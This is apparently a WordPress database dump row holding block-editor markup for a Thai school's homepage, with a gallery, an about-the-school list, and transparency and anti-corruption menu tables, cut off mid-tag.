(133,1,'2024-07-27 12:08:21','2024-07-27 05:08:21','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingBgColor\":\"#6096b4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" 